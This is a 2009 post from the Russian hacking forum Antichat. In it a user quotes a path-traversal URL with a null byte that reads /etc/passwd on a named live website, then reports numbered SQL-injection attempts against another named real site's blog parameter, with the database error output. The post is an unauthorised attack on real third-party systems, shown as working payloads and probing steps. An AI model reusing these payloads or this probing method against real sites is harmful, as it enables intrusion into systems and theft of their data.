HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 30.01.2009, 03:16
x311
Новичок
Регистрация: 23.01.2009
Сообщений: 4
С нами: 9104376

Репутация: -1
По умолчанию
Цитата:
Сообщение от ElteRUS  
Наверно нужно быть зарегенным что-бы увидеть...



http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00


улыбнуло

Спасибо всем ! значит просто я поля не так подбирал ...

вот еще одна незадача.




motion-twin.com/blog/month?m=10001'

1. Когда подставляю -10001' ошибка не выползает , но что бы выползла - не получается

2. Если выполнить такой запрос -1'/* ошибка показывается вот с такой фишкой , где меняется дата

SELECT BlogEntry.* FROM BlogEntry LEFT JOIN BlogCategory ON BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '-1'/-*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC' at line 1


3 . Если убрать минус то получится 1'/* то выдает date.c(104) : Invalid date format : 1-00-01


4 .Попбробовал -1-00-01'/* Календарь показал :

Zero -1
Lu Ma Me Je Ve Sa Di
1 2 3 4

5. (если -10 то ивалид date , если -100,-200 etc то на календаре меняется Zero -100, -200)

6 . Все что ниже 10000 = ошибка

7. А вот когда делаю запрос m=999999'+order+by+1/*

на календаре теперь

null 9999
Lu Ma Me Je Ve Sa Di
1 2 3 4

(на заметку : отображаются только числа 1,2.3.4 на каледнаре из 31)

8 . Пробовал 25-02-05' или 25-02-05 для примера показывает February 25

9. когда -25-02-05 выдает date.c(104) : Invalid date format : -25-02-01

10 . когда 1'+order+by+1/* выдает ошибку где вместо 0000 видно такое

BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '1' o-rd-01' AND cdate <= '1' o-rd-31' ORDER BY


=
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.